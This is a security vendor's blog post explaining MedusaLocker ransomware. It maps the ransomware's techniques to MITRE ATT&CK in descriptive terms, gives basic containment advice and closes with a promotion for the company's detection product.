Under Attack? Contact Us Start a Free Demo

MedusaLocker Ransomware-As-A-Service (RAAS) Explained

What is MedusaLocker Ransomware?

MedusaLocker is a RaaS (Ransomware as a Service) variant that was first discovered in 2019 and has taken over the world. To increase the effectiveness of the encryption, MedusaLocker ransomware removes volume shadow copies and disables system services to encrypt data using AES-256 encryption.

The MedusaLocker ransomware is typical ransomware that encrypts its victim's data and demands ransom for the decryption key. The MedusaLocker malware threat doesn't seem to have resulted in any data exfiltration, though it does threaten victims with releasing sensitive data.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) has released a joint advisorystating that "MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim's data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to transfer ransomware payments to a specific Bitcoin wallet address.".

MedusaLocker Ransomware - Mitre Attack TTPs

MedusaLocker actors use the ATT&CK techniques listed in Table 1.

Initial Access

Technique Title

ID

Use

External Remote Services

T1133

MedusaLocker actors gained access to victim devices through vulnerable RDP configurations.

Phishing

T1566

MedusaLocker actors used phishing and spearphishing to obtain access to victims' networks.

Valid Accounts

T1078

Threat actors use brute-force password guessing for RDP services. The revealed password allows the attacker to gain initial access to the victim's network.

Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

MedusaLocker actors may abuse PowerShell commands and scripts for execution.

Windows Management Instrumentation

T1047

MedusaLocker uses Windows Management Instrumentation command-line utility (wmic) to delete volume shadow copies to prevent victims from recovering their encrypted data.

Persistence

Technique Title

ID

Use

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

T1547

MedusaLocker establishes persistence and executes the ransomware at system startup by adding the following registry entry.

Privilege Escalation

Technique Title

ID

Use

Abuse Elevation Control Mechanism Bypass UAC

T1548.002

MedusaLocker ransomware uses the built-in Windows tool called Microsoft Connection Manager Profile Installer (cmstp.exe) to bypass User Account Control (UAC) and runs arbitrary commands with elevated privileges.

Valid Accounts

T1078

Threat actors use brute-force password guessing for RDP services. If the guessed password belongs to the domain administrator, they can execute commands with elevated privileges.

Defense Evasion

Technique Title

ID

Use

Impair Defenses: Disable or Modify Tools

T1562.001

MedusaLocker disables security products such as antivirus to avoid being detected.

Impair Defenses: Safe Mode Boot

T1562.009

MedusaLocker actors may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services.

Credential Access

Technique Title

ID

Use

Brute Force

T1110

Threat actors use brute-force password guessing for RDP services.

Discovery

Technique Title

ID

Use

File and Directory Discovery

T1083

MedusaLocker searches for files and directories in the victim's computer. After discovery, the ransomware starts to encrypt all files and directories

 

Network Share Discovery

T1135

MedusaLocker searches for shared files in the network. The shared files also indicate that there might be other hosts in the network that can be moved to laterally.

Query Registry

T1012

MedusaLocker searches the registry hive to learn about security products deployed in the victim's network.

Lateral Movement

Technique Title

ID

Use

Remote Services

T1021

MedusaLocker ransomware uses remote services to infect other hosts in the victim's network. Threat actors use RDP, PsExec, and SMB to spread the ransomware payload.

Command and Control

Technique Title

ID

Use

Ingress Tool Transfer

T1105

MedusaLocker uses certutil.exe to transfer files from its command and control server to the victim's network.

Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

MedusaLocker actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

Inhibit System Recovery

T1490

MedusaLocker actors may deny access to operating systems containing features that can help fix corrupted systems, such as backup catalog, volume shadow copies, and automatic repair.

Table 1: MedusaLocker Actors ATT&CK Techniques for Enterprise

How to Stop MedusaLocker Ransomware from Spreading?

You can stop MedusaLocker ransomware from spreading by isolating the infected devices from the rest of your network. Disconnecting the device will help stop the ransomware from encrypting files on other devices. Once devices are isolated, you can start scanning with antivirus software to remove the malware and any potential back doors that have been left behind.

How to Detect and Prevent MedusaLocker Ransomware Attack?

Cyber security threats and ransomware attacks are increasing at a tremendous pace. It is extremely difficult for cyber security analysts and incident responders to investigate and detect cyber security threats using conventional tools and techniques. NetSecurity’s ThreatResponder, with its diverse capabilities, can help your team detect the most advanced cyber threats, including APTs, zero-day attacks, and ransomware attacks. It can also help automate incident response actions across millions of endpoints, making it easy, fast, and hassle-free.

Want to try our ThreatResponder, cutting-edge Endpoint Detection & Response (EDR), and ThreatResponder FORENSICS, the Swiss knife for forensic investigators in action? Click on the below button to request a free demo of our NetSecurity’s ThreatResponder platform.


Disclaimer

The page's content shall be deemed proprietary and privileged information of NETSECURITY CORPORATION. It shall be noted that the contents of this page are copyrighted by NETSECURITY CORPORATION. Any violation/misuse/unauthorized use of this content "as is" or "modified" shall be considered illegal and subjected to articles and provisions that have been stipulated in the General Data Protection Regulation (GDPR) and Personal Data Protection Law (PDPL).

Author image
I am an experienced and CEH certified cybersecurity professional with expertise in incident response, forensic investigations, cyber threat intelligence, vulnerability mgmt. and cyber threat research.
Author image
About Inno Eroraha
Dulles, Virginia Website
Inno Eroraha is the Founder & Chief Strategist of NetSecurity Corporation, a cybersecurity products and services company based in Dulles, VA. NetSecurity is the developer of ThreatResponder Platform.
You've successfully subscribed to NetSecurity Blog
Great! Next, complete checkout for full access to NetSecurity Blog
Welcome back! You've successfully signed in.
Unable to sign you in. Please try again.
Success! Your account is fully activated, you now have access to all content.
Error! Stripe checkout failed.
Success! Your billing info is updated.
Error! Billing info update failed.